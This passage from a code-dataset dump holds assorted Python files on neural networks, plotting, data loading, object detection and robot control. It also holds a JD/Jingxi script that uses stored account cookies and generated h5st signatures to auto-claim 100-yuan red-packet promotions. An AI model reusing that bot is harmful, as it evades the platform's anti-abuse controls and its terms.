tr_hidden_size, tr_dropout, \n\t\ttr_attention_dropout, tr_relu_dropout, cuda):\n\n\t\tsuper(FunTimesTransformer, self).__init__()\n\n\t\tif MLP_before_arch != None:\n\t\t\tself.embed_dim_projection = MLP_for_me(MLP_before_arch)\n\t\telse:\n\t\t\tself.embed_dim_projection = None\n\n\t\tself.transformer = TransformerEncoder(\n\t\t\ttr_embed_dim, tr_max_positions, tr_pos, tr_num_layers,\n\t\t\ttr_num_heads, tr_filter_size, tr_hidden_size, tr_dropout, \n\t\t\ttr_attention_dropout, tr_relu_dropout, cuda)\n\n\t\tself.result_projection = MLP_for_me(MLP_after_arch)\n\t\t\n\tdef forward(self, x):\n\t\tif self.embed_dim_projection:\n\t\t\tx = self.embed_dim_projection(x)\n\t\tx = self.transformer(x)\n\t\tx = self.result_projection(x)\n\t\treturn x.squeeze(-1)\n\n\nclass YeetZ_MLP(nn.Module):\n\tdef __init__(self):\n\t\tsuper(YeetZ_MLP, self).__init__()\n\t\tself.layers = nn.Sequential(\n\t\t\tnn.Linear(60, 10),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Linear(10, 1),\n\t\t\tnn.Softplus()\n\t\t)\n\t\t\n\tdef forward(self, x):\n\t\tx = self.layers(x)\n\t\treturn x.squeeze(-1)\n\nclass EZConv(nn.Module):\n\tdef __init__(self):\n\t\tsuper(EZConv, self).__init__()\n\t\tself.conv = nn.Conv1d(8, 80, 25)\n\t\tself.conv2 = nn.Conv1d(80, 60, 5)\n\t\tself.conv3 = nn.Conv1d(60, 60, 5)\n\t\tself.act = nn.LeakyReLU(0.2)\n\t\tself.mlp = YeetZ_MLP()\n\n\tdef forward(self, x):\n\t\tx = x.transpose(1, 2)\n\t\tx = self.conv(x)\n\t\tx = F.max_pool1d(x, 3)\n\t\tx = self.act(x)\n\n\t\tx = self.conv2(x)\n\t\tx = F.max_pool1d(x, 3)\n\t\tx = self.act(x)\n\n\t\tx = self.conv3(x)\n\t\tx = F.max_pool1d(x, 3)\n\t\tx = self.act(x)\n\n\t\tx = x.transpose(1, 2)\n\t\tx = self.mlp(x)\n\t\treturn x","sub_path":"dnn_models.py","file_name":"dnn_models.py","file_ext":"py","file_size_in_byte":34799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"619365289","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*\n'''\n项目名称: JD-Script / jd_jxcfd_100hb\n活动名称: 财富岛-100元红包-兑换\nAuthor: SheYu09\ncron: 0 0,10 * * * jd_jxcfd_100hb.py\nnew Env('京喜 -*- 财富岛100元红包')\n'''\nimport requests, json, os, sys\nsys.path.append('../repo/SheYu09_jd_scripts_master/')\nimport jdCookie, HEADERS, h5st, posturl\n\ndef ExchangeState(header, name):\n global aNum\n try:\n url = 'https://m.jingxi.com/jxbfd/user/ExchangeState?strZone=jxbfd&dwType=2&_stk=dwType,strZone&sceneval=2&h5st='\n url += h5st.start(url, '10032')\n r = requests.get(url=url, headers=header).text\n data = json.loads(r)\n hongbaopool = data[\"hongbaopool\"]\n hongbao = data[\"hongbao\"]\n for i in hongbao:\n if i[\"strPrizeName\"] == '100元':\n ddwPaperMoney = i['ddwPaperMoney']\n dwLvl = i['dwLvl']\n break\n return hongbaopool, ddwPaperMoney, dwLvl\n except Exception as e:\n if aNum < 5:\n aNum += 1\n return ExchangeState(header, name)\n else:\n aNum = 0\n print(f'========== 【京东账号】{name} 已被Jd拉黑 ==========')\n print()\n return 0, 0, 0\n\ndef ExchangePrize(header, strPoolName, ddwPaperMoney, dwLvl):\n url = f'https://m.jingxi.com/jxbfd/user/ExchangePrize?strZone=jxbfd&dwType=3&dwLvl={dwLvl}&ddwPaperMoney={ddwPaperMoney}&strPoolName={strPoolName}&_stk=ddwPaperMoney,dwLvl,dwType,strPoolName,strZone&sceneval=2&h5st='\n url += h5st.start(url, '10032')\n r = requests.get(url=url, headers=header).text\n data = json.loads(r)\n print(data)\n if data['iRet'] == 0:\n print(f'{data[\"strAwardDetail\"][\"strName\"]}')\n else:\n print(f'{data[\"sErrMsg\"]}')\n print()\n\ndef start():\n print(' ******* 财富岛-100元红包-兑换 *******')\n print()\n cookiesList, pinNameList = jdCookie.start()\n for ckname in jdCookie.Name():\n try:\n ckNum = pinNameList.index(ckname)\n except:\n print(f\"请检查被助力账号【{ckname}】名称是否正确?提示:助力名字可填pt_pin的值、也可以填账号名。\")\n print()\n continue\n print(f\"*******开始【京东账号】{pinNameList[int(ckNum)]} *******\")\n print()\n hongbaopool, ddwPaperMoney, dwLvl = ExchangeState(HEADERS.jd_jxcfd(cookiesList[ckNum]), pinNameList[int(ckNum)])\n if hongbaopool == 0:\n continue\n ExchangePrize(HEADERS.jd_jxcfd(cookiesList[ckNum]), hongbaopool, ddwPaperMoney, dwLvl)\n\naNum = 0\nif __name__ == '__main__':\n start()\n","sub_path":"jd_jxcfd_100hb.py","file_name":"jd_jxcfd_100hb.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"21979772","text":"from bson.binary import Binary, USER_DEFINED_SUBTYPE\nimport pickle\nfrom pymongo import MongoClient\n\nfrom database.entities.datasetentities import DatasetImage, DatasetLabel, DatasetEntity\nfrom common.logger import get_logger\n\nmy_logger = get_logger(__name__)\n\nSERVER = \"localhost\"\nDB = \"dataset\"\nCOL_IMG_CLASS = \"classimages\"\nCOL_LABEL = \"labels\"\nCOL_LABEL_NAMES = \"labelnames\"\n\n\nclass DatasetDB(object):\n\n def __init__(self, datasetcollections):\n my_logger.info(\"Starting up Dataset Database.\")\n client = MongoClient(SERVER, 27017)\n db = client[DB]\n self.class_image_collection = db[COL_IMG_CLASS]\n self.label_collection = db[COL_LABEL]\n self.label_names = db[COL_LABEL_NAMES]\n my_logger.info(\"Dataset Database has been initiated.\")\n\n def insert_image_class(self, image_data): # image must be RGB\n my_logger.info(\"Attempting to insert image with image_id \" + str(image_data.get_image_id()))\n image_data = image_data.__dict__\n image_data['image'] = Binary(pickle.dumps(image_data['image']), subtype=USER_DEFINED_SUBTYPE)\n self.class_image_collection.insert_one(image_data)\n my_logger.info(\"Image has been inserted for image_id \" + str(image_data['image_id']))\n\n def insert_label_data(self, label_data):\n my_logger.info(\"Attempting to insert label with image_id \" + str(label_data.get_image_id()))\n label_data = label_data.__dict__\n self.label_collection.insert_one(label_data)\n my_logger.info(\"Label has been inserted for image_id \" + str(label_data['image_id']))\n\n def insert_label_names(self, label_name):\n my_logger.info(\"Attempting to insert label name \" + label_name.get_name())\n label_name = label_name.__dict__\n self.label_names.insert_one(label_name)\n my_logger.info(\"Label names has been inserted with name\" + label_name['name'])\n\n def read_image_class_data(self, start_id, end_id):\n my_logger.info(\"Attempting to read image with start_id \" + str(start_id) + \" and end_id \" + str(end_id))\n results = self.class_image_collection.find({\"image_id\": {\"$gte\": start_id, \"$lte\": end_id}})\n if results is None:\n return None\n dataset = list()\n for data in list(results):\n dataset.append(DatasetImage(data['_id'], data['filename'], pickle.loads(data['image'])))\n my_logger.info(\"Images count found: \" + str(len(dataset)))\n return dataset\n\n def read_label_data(self, start_id, end_id):\n my_logger.info(\"Attempting to label with start_id \" + str(start_id) + \" and end_id \" + str(end_id))\n results = self.label_collection.find({\"image_id\": {\"$gte\": start_id, \"$lte\": end_id}})\n #results = self.label_collection.find({\"type\": type_of_data, \"image_id\": {\"$gte\": start_id, \"$lte\": end_id}})\n if results is None:\n return None\n dataset = list()\n for data in list(results):\n dataset.append(DatasetLabel(data['image_id'], data['source'], data['type'], data['label']))\n my_logger.info(\"Labels count found: \" + str(len(dataset)))\n return dataset\n\n def read_image_class_and_label_data(self, start_id, end_id, type_of_data):\n images = self.read_image_class_data(start_id, end_id)\n labels = self.read_label_data(start_id, end_id)\n return DatasetEntity(images, labels)\n","sub_path":"database/datasetdb.py","file_name":"datasetdb.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"134700958","text":"import matplotlib\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nmatplotlib.use('Qt5Agg')\nfrom nilearn import plotting\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport seaborn as sns\nimport helper_functions.process_properties as prop\n\n\ndef plot_connectivity(X_conn):\n regions = ['LF','LC','LP','LO','LT','RF','RC','RP','RO','RT']\n conn_matrix = np.zeros((len(regions), len(regions)))\n coords = np.loadtxt('helper_functions/coordinates.txt')\n\n for t in range(len(X_conn)):\n tmp = X_conn\n conn_tmp = pd.DataFrame(np.zeros((len(regions), len(regions))))\n conn_tmp.columns = regions\n conn_tmp.index = regions\n\n for i in regions:\n for a in regions:\n try:\n conn_tmp.loc[i, a] = tmp[i + '_' + a]\n except:\n conn_tmp.loc[i, a] = tmp[a + '_' + i]\n\n conn_matrix = np.array(conn_tmp)\n\n colormap = matplotlib.cm.get_cmap('OrRd')\n norm = matplotlib.colors.Normalize(vmin=0, vmax=0.3)\n\n fig=plotting.plot_connectome(conn_matrix, node_coords=coords, edge_vmin=0, edge_vmax=0.3,\n edge_cmap=colormap, colorbar=True, edge_threshold=None,\n node_color=colormap(norm(conn_matrix.diagonal())),\n display_mode='lzr')\n return fig\n\ndef plot_pca_results(pdf,X3,Y_out):\n fig = plt.figure(figsize=(6, 6))\n ax = Axes3D(fig)\n n = np.where(Y_out == 0)\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2], color='blue', label=\"Non-Recovered Patients\")\n n = np.where(Y_out == 1)\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2], color='green', label=\"Non-Recovered CMD\")\n n = np.where(Y_out == 2)\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2], color='red', label=\"Recovered Patients\")\n n = np.where(Y_out == 3)\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2], color='orange', label=\"Healthy Control\")\n plt.title('PCA_allPart_wholeBrain_alpha')\n plt.legend(loc='lower right')\n pdf.savefig(fig)\n plt.close()\n\n fig, ax = plt.subplots(1, 3, figsize=(12, 6))\n fig.suptitle('PCA_allPart_wholeBrain_alpha', size=16)\n\n ax[0].set_title('PC 0 and 1')\n n = np.where(Y_out == 0)\n ax[0].scatter(X3[n, 0], X3[n, 1], color='blue', label=\"Non-Recovered Patients\")\n n = np.where(Y_out == 1)\n ax[0].scatter(X3[n, 0], X3[n, 1], color='green', label=\"Non-Recovered CMD\")\n n = np.where(Y_out == 2)\n ax[0].scatter(X3[n, 0], X3[n, 1], color='red', label=\"Recovered Patients\")\n n = np.where(Y_out == 3)\n ax[0].scatter(X3[n, 0], X3[n, 1], color='orange', label=\"Healthy Control\")\n\n ax[1].set_title('PC 1 and 2')\n n = np.where(Y_out == 0)\n ax[1].scatter(X3[n, 1], X3[n, 2], color='blue', label=\"Non-Recovered Patients\")\n n = np.where(Y_out == 1)\n ax[1].scatter(X3[n, 1], X3[n, 2], color='green', label=\"Non-Recovered CMD\")\n n = np.where(Y_out == 2)\n ax[1].scatter(X3[n, 1], X3[n, 2], color='red', label=\"Recovered Patients\")\n n = np.where(Y_out == 3)\n ax[1].scatter(X3[n, 1], X3[n, 2], color='orange', label=\"Healthy Control\")\n\n ax[2].set_title('PC 0 and 2')\n n = np.where(Y_out == 0)\n ax[2].scatter(X3[n, 0], X3[n, 2], color='blue', label=\"Non-Recovered Patients\")\n n = np.where(Y_out == 1)\n ax[2].scatter(X3[n, 0], X3[n, 2], color='green', label=\"Non-Recovered CMD\")\n n = np.where(Y_out == 2)\n ax[2].scatter(X3[n, 0], X3[n, 2], color='red', label=\"Recovered Patients\")\n n = np.where(Y_out == 3)\n ax[2].scatter(X3[n, 0], X3[n, 2], color='orange', label=\"Healthy Control\")\n\n plt.legend(loc='lower right')\n pdf.savefig(fig)\n plt.close()\n\n\ndef plot_clustered_pca(pdf,X3,Y_out,P,k):\n # visualize in 3D\n fig = plt.figure(figsize=(6,6))\n ax = Axes3D(fig)\n n = np.where(Y_out==0)[0]\n ax.scatter(X3[n, 0], X3[n, 1],X3[n, 2],marker='o',c=P[n],label=\"Non-Recovered Patients\")\n n= np.where(Y_out==1)[0]\n ax.scatter(X3[n, 0], X3[n, 1],X3[n, 2],marker='x',c=P[n],label=\"Non-Recovered CMD \")\n n = np.where(Y_out == 2)[0]\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2],marker='.', c=P[n], label=\"Recovered Patients\")\n n = np.where(Y_out == 3)[0]\n ax.scatter(X3[n, 0], X3[n, 1], X3[n, 2],marker='v', c=P[n], label=\"Healthy controls\")\n plt.title('{}_Clusters_allPart_wholeBrain_alpha'.format(str(k)))\n plt.legend(loc='lower right')\n pdf.savefig(fig)\n plt.close()\n\n fig, ax = plt.subplots(1, 3, figsize=(12, 6))\n fig.suptitle('{}_Clusters_allPart_wholeBrain_alpha'.format(str(k)), size=16)\n\n ax[0].set_title('PC 0 and 1')\n n = np.where(Y_out == 0)[0]\n ax[0].scatter(X3[n, 0], X3[n, 1], marker='o', c=P[n], label=\"Non-Recovered Patients\")\n n = np.where(Y_out == 1)[0]\n ax[0].scatter(X3[n, 0], X3[n, 1], marker='x', c=P[n], label=\"Non-Recovered CMD \")\n n = np.where(Y_out == 2)[0]\n ax[0].scatter(X3[n, 0], X3[n, 1], marker='.', c=P[n], label=\"Recovered Patients\")\n n = np.where(Y_out == 3)[0]\n ax[0].scatter(X3[n, 0], X3[n, 1], marker='v', c=P[n], label=\"Healthy controls\")\n\n ax[1].set_title('PC 1 and 2')\n n = np.where(Y_out==0)[0]\n ax[1].scatter(X3[n, 1],X3[n, 2],marker='o',c=P[n],label=\"Non-Recovered Patients\")\n n= np.where(Y_out==1)[0]\n ax[1].scatter(X3[n, 1],X3[n, 2],marker='x',c=P[n],label=\"Non-Recovered CMD \")\n n = np.where(Y_out == 2)[0]\n ax[1].scatter(X3[n, 1], X3[n, 2],marker='.', c=P[n], label=\"Recovered Patients\")\n n = np.where(Y_out == 3)[0]\n ax[1].scatter(X3[n, 1], X3[n, 2],marker='v', c=P[n], label=\"Healthy controls\")\n\n ax[2].set_title('PC 0 and 2')\n n = np.where(Y_out==0)[0]\n ax[2].scatter(X3[n, 0], X3[n, 2], marker='o',c=P[n],label=\"Non-Recovered Patients\")\n n= np.where(Y_out==1)[0]\n ax[2].scatter(X3[n, 0], X3[n, 2], marker='x',c=P[n],label=\"Non-Recovered CMD \")\n n = np.where(Y_out == 2)[0]\n ax[2].scatter(X3[n, 0], X3[n, 2], marker='.', c=P[n], label=\"Recovered Patients\")\n n = np.where(Y_out == 3)[0]\n ax[2].scatter(X3[n, 0], X3[n, 2], marker='v', c=P[n], label=\"Healthy controls\")\n\n plt.legend(loc='lower right')\n pdf.savefig(fig)\n plt.close()\n\n\n\n\ndef plot_explained_variance(pdf,pca):\n # PLot explained Variance\n fig = plt.figure()\n plt.plot(np.cumsum(pca.explained_variance_ratio_))\n plt.xlabel('number of components')\n plt.ylabel('cumulative explained variance')\n plt.title('Explained_Variance_allPart_wholeBrain_alpha')\n pdf.savefig(fig)\n plt.close()\n\n\ndef plot_pie_and_distribution(pdf,part,part_cluster,k):\n fig, ax = plt.subplots(1, 2, figsize=(12, 6))\n fig.suptitle('Part {}; {}_Clusters_wholeBrain_alpha'.format(part, k), size=16)\n\n ax[0].plot(part_cluster)\n ax[0].set_ylim(0, k - 1)\n ax[0].set_title('Part {}; {}_Clusters_wholeBrain_alpha'.format(part, k))\n ax[0].set_ylabel('cluaster_Number')\n ax[0].set_xlabel('time')\n\n piedata = []\n clusternames = []\n for i in range(k):\n piedata.append(list(part_cluster).count(i))\n clusternames.append('cluster ' + str(i))\n\n ax[1].pie(piedata, labels=clusternames, autopct='%1.1f%%', startangle=90)\n pdf.savefig(fig)\n plt.close()\n\ndef plot_group_TPM(P, Y_out, k, pdf):\n P_nonr = P[Y_out == 0]\n P_ncmd = P[Y_out == 1]\n P_reco = P[Y_out == 2]\n P_heal = P[Y_out == 3]\n\n\n TPM_nonr = prop.get_transition_matrix(P_nonr,k)\n TPM_ncmd = prop.get_transition_matrix(P_ncmd,k)\n TPM_reco = prop.get_transition_matrix(P_reco,k)\n TPM_heal = prop.get_transition_matrix(P_heal,k)\n\n f, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4, figsize=(12,3))\n g1 = sns.heatmap(TPM_heal, annot=True,cbar=False, ax = ax1, fmt='.1g')\n g1.set_title('Healthy')\n g2 = sns.heatmap(TPM_reco, annot=True,cbar=False, ax = ax2, fmt='.1g')\n g2.set_title('Recovered')\n g3 = sns.heatmap(TPM_nonr, annot=True,cbar=False, ax= ax3, fmt='.1g')\n g3.set_title('Non recovered')\n g4 = sns.heatmap(TPM_ncmd, annot=True,cbar=False, ax= ax4, fmt='.1g')\n g4.set_title('Non recovered CMD')\n pdf.savefig(f)\n plt.close()\n\ndef plot_group_averaged_TPM(AllPart, P, Y_out, k, pdf, data):\n\n P_nonr = np.empty((len(AllPart[\"Part_nonr\"]),k,k))\n P_ncmd = np.empty((len(AllPart[\"Part_ncmd\"]),k,k))\n P_reco = np.empty((len(AllPart[\"Part_reco\"]),k,k))\n P_heal = np.empty((len(AllPart[\"Part_heal\"]),k,k))\n\n for c,part in enumerate(AllPart[\"Part_heal\"]):\n part_cluster = P[data['ID'] == part]\n P_heal[c,:,:] = prop.get_transition_matrix(part_cluster, k)\n\n for c,part in enumerate(AllPart[\"Part_reco\"]):\n part_cluster = P[data['ID'] == part]\n P_reco[c,:,:] = prop.get_transition_matrix(part_cluster, k)\n\n for c,part in enumerate(AllPart[\"Part_nonr\"]):\n part_cluster = P[data['ID'] == part]\n P_nonr[c,:,:] = prop.get_transition_matrix(part_cluster, k)\n\n for c,part in enumerate(AllPart[\"Part_ncmd\"]):\n part_cluster = P[data['ID'] == part]\n P_ncmd[c,:,:] = prop.get_transition_matrix(part_cluster, k)\n\n TPM_heal = np.mean(P_heal,axis=0)\n TPM_reco = np.mean(P_reco,axis=0)\n TPM_nonr = np.mean(P_nonr,axis=0)\n TPM_ncmd = np.mean(P_ncmd,axis=0)\n\n f, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4, figsize=(12,3))\n g1 = sns.heatmap(TPM_heal, annot=True,cbar=False, ax = ax1, fmt='.1g')\n g1.set_title('Healthy')\n g2 = sns.heatmap(TPM_reco, annot=True,cbar=False, ax = ax2, fmt='.1g')\n g2.set_title('Recovered')\n g3 = sns.heatmap(TPM_nonr, annot=True,cbar=False, ax= ax3, fmt='.1g')\n g3.set_title('Non recovered')\n g4 = sns.heatmap(TPM_ncmd, annot=True,cbar=False, ax= ax4, fmt='.1g')\n g4.set_title('Non recovered CMD')\n pdf.savefig(f)\n plt.close()\n","sub_path":"FC_Clustering_DOC/helper_functions/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":9651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"31442450","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 7 21:19:57 2021\n\n@author: 11200\n\"\"\"\n\n#使用Dataset 和 DataLoader\n\nimport torch\nimport numpy as np\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\n\nclass DiabetesDataset(Dataset):\n def __init__(self,filepath):\n xy=np.loadtxt(filepath,delimiter=',',dtype=np.float32)\n #print(xy.shape) #(759, 9)\n #获得数据的行数\n self.len=xy.shape[0]\n self.x_data=torch.from_numpy(xy[:,:-1])\n self.y_data=torch.from_numpy(xy[:,[-1]])\n \n def __getitem__(self, index):\n return self.x_data[index],self.y_data[index]\n \n def __len__(self):\n return self.len\n\n\n\nclass Model(torch.nn.Module):\n def __init__(self):\n super(Model,self).__init__()\n self.linear1=torch.nn.Linear(8, 4)\n self.linear2=torch.nn.Linear(4, 2)\n self.linear3=torch.nn.Linear(2, 1)\n self.sigmoid=torch.nn.Sigmoid()\n def forward(self,x):\n x=self.sigmoid(self.linear1(x))\n x=self.sigmoid(self.linear2(x))\n x=self.sigmoid(self.linear3(x))\n return x\n\nif __name__ == '__main__':\n filepath=\"diabetes.csv.gz\"\n \n dataset=DiabetesDataset(filepath)\n \n\n train_loader=DataLoader(dataset=dataset,\n batch_size=32,\n shuffle=True,\n num_workers=2)\n \n model=Model()\n criterion=torch.nn.BCELoss(size_average=True)\n optimizer=torch.optim.SGD(model.parameters(), lr=0.01)\n \n Epoch=100\n for epoch in range(Epoch):\n cost=0.0\n for idx,data in enumerate(train_loader):\n inputs,targets=data\n\n outputs=model(inputs)\n \n loss=criterion(outputs,targets)\n \n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n cost+=loss.item()\n \n print(epoch,cost)\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n","sub_path":"test/09DatasetAndDataLoader_01.py","file_name":"09DatasetAndDataLoader_01.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"297356604","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.12-intel/egg/sample/maze/maze_helper.py\n# Compiled at: 2016-10-26 09:22:48\nfrom kyoka.policy.greedy_policy import GreedyPolicy\n\nclass MazeHelper:\n\n @classmethod\n def visualize_maze(self, maze):\n return ('\\n').join(maze)\n\n @classmethod\n def measure_performance(self, domain, value_function, step_limit=10000):\n policy = GreedyPolicy()\n state = domain.generate_initial_state()\n step_counter = 0\n while not domain.is_terminal_state(state):\n action = policy.choose_action(domain, value_function, state)\n state = domain.transit_state(state, action)\n step_counter += 1\n if step_counter >= step_limit:\n break\n\n return step_counter\n\n @classmethod\n def visualize_policy(self, domain, value_function):\n icon_map = {domain.UP: '^', domain.DOWN: 'v', domain.RIGHT: '>', domain.LEFT: '<', -1: '-', -2: 'G'}\n actions = self.__find_best_actions_on_each_cell(domain, value_function)\n flg2icon = lambda flg: icon_map[flg]\n visualized_actions = [ [ flg2icon(flg) for flg in line ] for line in actions ]\n return self.visualize_maze([ ('').join(line) for line in visualized_actions ])\n\n @classmethod\n def __find_best_actions_on_each_cell(self, domain, value_function):\n height, width = domain.get_maze_shape()\n goal_r, goal_c = domain.generate_terminal_state()\n curry = lambda row, col: self.__find_single_best_action(domain, value_function, row, col)\n maze_with_answer = [ [ curry(row, col) for col in range(width) ] for row in range(height) ]\n maze_with_answer[goal_r][goal_c] = -2\n return maze_with_answer\n\n @classmethod\n def __find_single_best_action(self, domain, value_function, row, col):\n state = (row, col)\n actions = domain.generate_possible_actions(state)\n values = [ value_function.calculate_value(state, action) for action in actions ]\n best_actions = [ act for act, val in zip(actions, values) if val == max(values) ]\n if len(best_actions) == 1:\n return best_actions[0]\n else:\n return -1","sub_path":"pycfiles/kyoka-0.2.1-py2.7/maze_helper.py","file_name":"maze_helper.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"448272746","text":"#!/usr/bin/env python3\n\n# Day 15: Product of Array Except Self\n#\n# Given an array nums of n integers where n > 1, return an array output such\n# that output[i] is equal to the product of all the elements of nums except\n# nums[i].\n# Constraint: It's guaranteed that the product of the elements of any prefix or\n# suffix of the array (including the whole array) fits in a 32 bit integer.\n# Note: Please solve it without division and in O(n).\n# Follow up:\n# - Could you solve it with constant space complexity? (The output array does\n# not count as extra space for the purpose of space complexity analysis.)\n\nclass Solution:\n def productExceptSelf(self, nums: [int]) -> [int]:\n output = [1] + [0 for _ in nums[1:]]\n # left to right\n for i in range(1, len(nums)):\n output[i] = output[i - 1] * nums[i - 1]\n # right to left\n product_on_right = 1\n for i in range(len(nums)-1, -1, -1):\n output[i] *= product_on_right\n product_on_right *= nums[i]\n return output\n\n# Test\nassert Solution().productExceptSelf([1,2,3,4]) == [24,12,8,6]\n","sub_path":"2020-04-month-long-challenge/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"609366549","text":"import cv2\r\nimport numpy as np\r\ndef detectImage(filename):\r\n thres = 0.45 # Threshold to detect object\r\n img = cv2.imread(filename)\r\n\r\n\r\n classNames= []\r\n classFile = 'coco.names'\r\n with open(classFile,'rt') as f:\r\n classNames = f.read().rstrip('\\n').split('\\n')\r\n\r\n configPath = 'ssd_mobilenet_v3_large_coco_2020_01_14.pbtxt'\r\n weightsPath = 'frozen_inference_graph.pb'\r\n\r\n net = cv2.dnn_DetectionModel(weightsPath,configPath)\r\n net.setInputSize(320,320)\r\n net.setInputScale(1.0/ 127.5)\r\n net.setInputMean((127.5, 127.5, 127.5))\r\n net.setInputSwapRB(True)\r\n\r\n #while True:\r\n #success,img = cap.read()\r\n classIds, confs, bbox = net.detect(img,confThreshold=thres)\r\n print(classIds,bbox)\r\n\r\n COLORS = np.random.uniform(0, 255, size=(len(classNames), 3))\r\n #if len(classIds) != 0:\r\n for classId, confidence,box in zip(classIds.flatten(),confs.flatten(),bbox):\r\n # cv2.rectangle(img,box,color=(0,255,0),thickness=2)\r\n # cv2.putText(img,classNames[classId-1],(box[0],box[1]+30),\r\n # cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\r\n # cv2.putText(img,str(round(confidence*100,2)),(box[0],box[1]-10),\r\n # cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\r\n\r\n\r\n (startX, startY, endX, endY) = box.astype(\"int\")\r\n # display the prediction\r\n label = \"{}: {:.2f}%\".format(classNames[classId-1], confidence * 100)\r\n cv2.rectangle(img,box ,COLORS[classId-1], 2)\r\n y = startY - 15 if startY - 15 > 15 else startY + 15\r\n cv2.putText(img, label, (startX, y),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[classId-1], 2)\r\n\r\n cv2.imwrite('ImgToSend/img0.jpg', img)\r\n #cv2.imshow(\"Output\",img)\r\n #cv2.waitKey(0)","sub_path":"ImageDetection.py","file_name":"ImageDetection.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"479019715","text":"# Example code for IMRT100 robot project\n\n\n# Import some modules that we need\nimport imrt_robot_serial\nimport signal\nimport time\nimport sys\nimport random\n\nLEFT = -1\nRIGHT = 1\nFORWARDS = 1\nBACKWARDS = -1\nDRIVING_SPEED = 200\nSTOP_DISTANCE = 35\nTURN_SPEED_RIGHT = 180\nTURN_SPEED_LEFT = 100\nTURN_SPEED_BIG = 180\n\n\ndef stop_robot(duration):\n\n iterations = int(duration * 10)\n \n for i in range(iterations):\n motor_serial.send_command(0, 0)\n time.sleep(0.10)\n\n\n\ndef drive_robot(direction, duration):\n \n speed = DRIVING_SPEED * direction\n iterations = int(duration * 10)\n\n for i in range(iterations):\n motor_serial.send_command(speed, speed)\n time.sleep(0.10)\n\n\n\ndef turn_robot_90_degrees_right():\n\n direction = 1\n iterations = 1\n \n for i in range(iterations):\n motor_serial.send_command(TURN_SPEED_RIGHT * direction, -TURN_SPEED_RIGHT * direction)\n time.sleep(0.1)\n\ndef turn_robot_mange_degrees_right():\n\n direction = 1\n iterations = 8\n \n for i in range(iterations):\n motor_serial.send_command(TURN_SPEED_BIG * direction, -TURN_SPEED_BIG * direction)\n time.sleep(0.1)\n\n\ndef turn_robot_90_degrees_left():\n\n direction = -1\n iterations = 1\n \n for i in range(iterations):\n motor_serial.send_command(TURN_SPEED_LEFT * direction, -TURN_SPEED_LEFT* direction)\n time.sleep(0.1)\n\n\n\n# We want our program to send commands at 10 Hz (10 commands per second)\nexecution_frequency = 10 #Hz\nexecution_period = 1. / execution_frequency #seconds\n\n\n# Create motor serial object\nmotor_serial = imrt_robot_serial.IMRTRobotSerial()\n\n\n# Open serial port. Exit if serial port cannot be opened\ntry:\n motor_serial.connect(\"/dev/ttyACM0\")\nexcept:\n print(\"Could not open port. Is your robot connected?\\nExiting program\")\n sys.exit()\n\n \n# Start serial receive thread\nmotor_serial.run()\n\n\n# Now we will enter a loop that will keep looping until the program terminates\n# The motor_serial object will inform us when it's time to exit the program\n# (say if the program is terminated by the user)\nprint(\"Entering loop. Ctrl+c to terminate\")\nwhile not motor_serial.shutdown_now :\n\n\n ###############################################################\n # This is the start of our loop. Your code goes below. #\n # #\n # An example is provided to give you a starting point #\n # In this example we get the distance readings from each of #\n # the two distance sensors. Then we multiply each reading #\n # with a constant gain and use the two resulting numbers #\n # as commands for each of the two motors. #\n # ________________________________________________________ #\n # | | #\n # V #\n # V #\n ###############################################################\n\n\n\n\n\n\n # Get and print readings from distance sensors\n dist_1 = motor_serial.get_dist_1()\n dist_2 = motor_serial.get_dist_2()\n dist_3 = motor_serial.get_dist_3()\n dist_4 = motor_serial.get_dist_4()\n\n print(\"Høyre bak:\", dist_1, \"Høyre skrå:\", dist_2, \"Høyre foran:\", dist_3,\"Midt foran:\", dist_4)\n \n if dist_3 == 255 and dist_2 < 30 and dist_1 < 30:\n print(\"Feilretting\")\n turn_robot_90_degrees_left()\n dist_3 = motor_serial.get_dist_3()\n\n if dist_4 < 25: \n turn_robot_90_degrees_left()\n print(\"Justering foran\")\n time.sleep(0.1)\n \n elif dist_2 < 12 or dist_3 < 5:\n turn_robot_90_degrees_left()\n print(\"Justering vegg venstre\")\n time.sleep(0.10)\n \n elif dist_3 > 50 and dist_1 < 30:\n drive_robot(FORWARDS, 